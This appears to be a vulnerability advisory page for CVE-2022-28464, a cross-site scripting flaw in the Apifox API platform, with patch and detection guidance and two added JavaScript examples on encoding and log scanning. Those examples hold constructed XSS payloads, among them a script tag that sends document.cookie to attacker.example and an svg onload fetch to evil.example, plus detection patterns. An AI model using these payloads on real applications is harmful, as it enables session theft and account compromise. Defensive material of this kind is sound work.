CVE-2022-28464

9.0 CRITICAL

📋 TL;DR

CVE-2022-28464 is a cross-site scripting (XSS) vulnerability in the Apifox API development platform, versions through 2.1.6. An attacker who can get crafted content in front of a vulnerable client can inject script that runs in the application's own context. Because that context is the application itself rather than a sandboxed web page, the advisory rates the outcome as remote code execution on the affected host, not merely a hijacked session. Every user running an unpatched version is affected; no special configuration is needed to be exposed.

💻 Affected Systems

Products:
  • Apifox
Versions: through 2.1.6
Operating Systems: All platforms running Apifox
Default Config Vulnerable: ⚠️ Yes
Notes: All installations of affected versions are vulnerable regardless of configuration.

📦 What is this software?

Apifox is an API development platform used to design, debug, mock, document and test HTTP APIs. It is distributed as a desktop client for Windows, macOS and Linux and as a web version. The desktop client is an Electron-style application in which page script runs with more than a browser tab's privileges, which is why script injection in it is rated as potential code execution rather than browser-confined XSS.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete compromise of the host running Apifox via remote code execution, theft of stored API definitions and credentials, and lateral movement from that host into the network.

🟠 Likely Case

Session hijacking, credential theft, and unauthorized access to API data and project configurations of the user who opened the crafted content.

🟢 If Mitigated

Limited impact: with the vendor fix applied, or with output encoding and a strict Content-Security-Policy enforced on a web deployment you control, the injected payload renders as inert text and exposure is at most minor.

🌐 Internet-Facing: HIGH - Web applications with XSS vulnerabilities are prime targets for internet-based attacks.
🏢 Internal Only: MEDIUM - Internal users could still exploit, but attack surface is smaller than internet-facing.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

XSS is exploited with readily available tools and payload lists, and the attacker needs no credentials of their own. A victim still has to open the crafted content in a vulnerable client, so user interaction is part of the attack path even though the exploit itself is unauthenticated.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.1.7 or later

Vendor Advisory: https://www.yuque.com/docs/share/b3115557-2dce-4897-b297-454c6df89d18

Restart Required: Yes

Instructions:

1. Download the latest Apifox release from the official source.
2. Quit or stop the running Apifox instance.
3. Install the updated version.
4. Start Apifox again and confirm the version shown is 2.1.7 or later.

🔧 Temporary Workarounds

Input Validation Filter (platform: all)

Strict input validation and output encoding are the vendor-side fix for XSS; an operator cannot retrofit them into a packaged Apifox build. Until the patch is applied, the practical equivalent is to keep untrusted content out of the application: do not import, open or follow Apifox content that comes from sources you do not trust.

Content Security Policy (platform: all)

Where Apifox content is served through a web server or reverse proxy you control, add a Content-Security-Policy header that restricts script sources to the application's own origin and forbids inline script and eval. This blunts injected markup that reaches the page. An operator cannot apply a CSP to the desktop client, so this workaround does not cover it.
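
The following is an added example and not Apifox's own code: it shows the rendering mistake behind a typical stored XSS beside its hardened form, the CSP value a reverse proxy in front of a web deployment could send, and a check that a rendered fragment contains only the tags the template itself emits. The endpoint field names, the rendering template and the payloads are constructed for illustration.

```javascript
// Added example, not Apifox's own code: the rendering mistake behind a
// typical stored XSS beside its hardened form, a strict CSP value for a
// reverse proxy, and a check that rendered output contains only template tags.
// Endpoint field names and payloads are constructed for illustration.

// Encode for HTML text and double-quoted attribute contexts.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: untrusted API metadata is concatenated straight into markup.
function renderEndpointUnsafe(endpoint) {
  return `<div class="endpoint" title="${endpoint.summary}">` +
    `<h3>${endpoint.name}</h3><p>${endpoint.description}</p></div>`;
}

// Hardened: every untrusted value is encoded for the context it lands in.
function renderEndpointSafe(endpoint) {
  return `<div class="endpoint" title="${escapeHtml(endpoint.summary)}">` +
    `<h3>${escapeHtml(endpoint.name)}</h3>` +
    `<p>${escapeHtml(endpoint.description)}</p></div>`;
}

// Policy a reverse proxy in front of a web deployment could send. Inline
// script and eval are refused, so injected markup that slips past encoding
// still does not execute in a CSP-enforcing browser.
function cspHeaderValue() {
  return [
    "default-src 'self'",
    "script-src 'self'",
    "object-src 'none'",
    "base-uri 'none'",
    "frame-ancestors 'none'",
  ].join('; ');
}

// Names of every element opened in a fragment; after hardening the list
// must contain only the tags the template itself emits.
function openTagNames(html) {
  const names = [];
  const re = /<([a-z][a-z0-9]*)/gi;
  let m;
  while ((m = re.exec(html)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Constructed hostile endpoint definition: one payload per injection context
// (text node, double-quoted attribute, and a tag carrying an event handler).
const hostileEndpoint = {
  name: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  summary: '" onmouseover="alert(document.domain)',
  description: '<img src=x onerror="alert(1)">',
};

// Usage (run with: node this_file.js). The unsafe render opens five elements,
// two of them attacker-controlled; the safe render opens only the template's three.
console.log('unsafe tags:', openTagNames(renderEndpointUnsafe(hostileEndpoint)));
console.log('safe tags:  ', openTagNames(renderEndpointSafe(hostileEndpoint)));
console.log('safe html:  ', renderEndpointSafe(hostileEndpoint));
console.log('CSP:        ', cspHeaderValue());
```

The tag-name check is deliberately coarse: it is a regression test for a template, not a sanitizer. The `summary` payload shows why encoding has to be per context; a filter that only strips `<script>` would leave the attribute breakout intact.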

🧯 If You Can't Patch

  • Isolate Apifox instances in network segments with strict access controls, and restrict their outbound connectivity so a successful payload cannot freely reach attacker infrastructure
  • Where Apifox is reached through a web front end you control, put a web application firewall (WAF) with XSS rules in front of it; the WAF does not protect the desktop client
  • Treat Apifox content from untrusted sources as hostile until the patch is applied, since the victim has to open the crafted content for the attack to work

🔍 How to Verify

Check if Vulnerable:

Check Apifox version in application settings or about dialog. If version is 2.1.6 or earlier, system is vulnerable.

Check Version:

Check version in Apifox UI or configuration files (platform dependent)

Verify Fix Applied:

Verify that Apifox reports version 2.1.7 or later after the update. For a functional check, enter a benign test payload in user-supplied fields of a throwaway project (never in production data) and confirm it is rendered as literal text rather than executed.

📡 Detection & Monitoring

Log Indicators:

  • Unusual script tags in request logs
  • Suspicious JavaScript payloads in URLs or parameters

Network Indicators:

  • HTTP requests containing script injection patterns
  • Unusual outbound connections from Apifox instances

SIEM Query:

source="apifox" AND (http_request contains "<script>" OR http_request contains "javascript:")

This query matches only the literal, lowercase, unencoded strings. Decode percent-encoding before matching and also look for inline event-handler attributes (on*=) and other executable tags (img, svg, iframe), or the query misses most real payloads.
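
As an added example, not part of the original advisory, the pass below runs both the literal query above and a normalizing detector over constructed access-log lines for an Apifox web deployment and shows which lines each one flags. The log format, client addresses and request paths are assumptions made for the example.

```javascript
// Added example, not part of the original advisory: a detection pass over
// constructed access-log lines for an Apifox web deployment, showing what the
// literal "<script>" / "javascript:" query catches and what it misses.
// The log format, hostnames and request paths are assumptions.

// Constructed sample access-log lines: timestamp, client, method, path, status.
const SAMPLE_LOG = `
2022-04-05T10:01:02Z 203.0.113.7 GET /api/projects/42/endpoints?name=<script>alert(1)</script> 200
2022-04-05T10:01:09Z 203.0.113.7 GET /api/projects/42/endpoints?name=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E 200
2022-04-05T10:02:15Z 198.51.100.3 POST /api/projects/42/docs?desc=<svg/onload=fetch('//evil.example')> 201
2022-04-05T10:03:44Z 192.0.2.9 GET /api/projects/42/endpoints?name=javascript:alert(document.domain) 200
2022-04-05T10:04:01Z 192.0.2.9 GET /api/projects/42/endpoints?name=%6A%61%76%61%73%63%72%69%70%74%3Aalert(1) 200
2022-04-05T10:05:30Z 198.51.100.8 GET /api/projects/42/endpoints?name=Users%20and%20Onboarding 200
2022-04-05T10:06:12Z 198.51.100.8 GET /api/projects/42/endpoints?name=ScriptTimeout 200
`.trim().split('\n');

// Parse one line into its fields; a malformed line yields null.
function parseLine(line) {
  const m = /^(\S+) (\S+) (\S+) (\S+) (\d{3})$/.exec(line);
  if (!m) return null;
  return { ts: m[1], client: m[2], method: m[3], path: m[4], status: m[5] };
}

// Undo percent-encoding (twice, to catch double encoding) and lower-case.
function normalize(path) {
  let out = path;
  for (let i = 0; i < 2; i++) {
    try { out = decodeURIComponent(out); } catch (e) { break; }
  }
  return out.toLowerCase();
}

// The page's literal query: substring match, no decoding, case-sensitive.
function naiveMatch(line) {
  return line.includes('<script>') || line.includes('javascript:');
}

// Normalized match: executable tag openers, inline event handlers, script scheme.
const XSS_PATTERNS = [
  /<\s*\/?\s*(script|img|svg|iframe|object|embed|body)\b/i,  // tag opener
  /[\s"'\/]on[a-z]+\s*=/i,                                   // on*= handler
  /javascript\s*:/i,                                         // script scheme
];
function normalizedMatch(path) {
  const n = normalize(path);
  return XSS_PATTERNS.some((re) => re.test(n));
}

// Run both detectors; returns the line indexes each one flagged.
function scan(lines) {
  const naive = [];
  const normalized = [];
  lines.forEach((line, i) => {
    const rec = parseLine(line);
    if (!rec) return;
    if (naiveMatch(line)) naive.push(i);
    if (normalizedMatch(rec.path)) normalized.push(i);
  });
  return { naive, normalized };
}

// Usage (run with: node this_file.js). The literal query flags only lines 0
// and 3; the normalizing detector also catches the encoded <img>, the <svg>
// with an onload handler, and the percent-encoded javascript: URL, while the
// benign "Onboarding" and "ScriptTimeout" lines stay quiet.
const result = scan(SAMPLE_LOG);
console.log('naive hits:     ', result.naive);
console.log('normalized hits:', result.normalized);
```

The handler pattern requires a separator before `on` and an `=` after the name so that ordinary words such as "Onboarding" do not trip it; tune the tag list and separators to the traffic you actually see before treating the rule as an alert source.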

🔗 References

  • Vendor advisory: https://www.yuque.com/docs/share/b3115557-2dce-4897-b297-454c6df89d18
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2022-28464
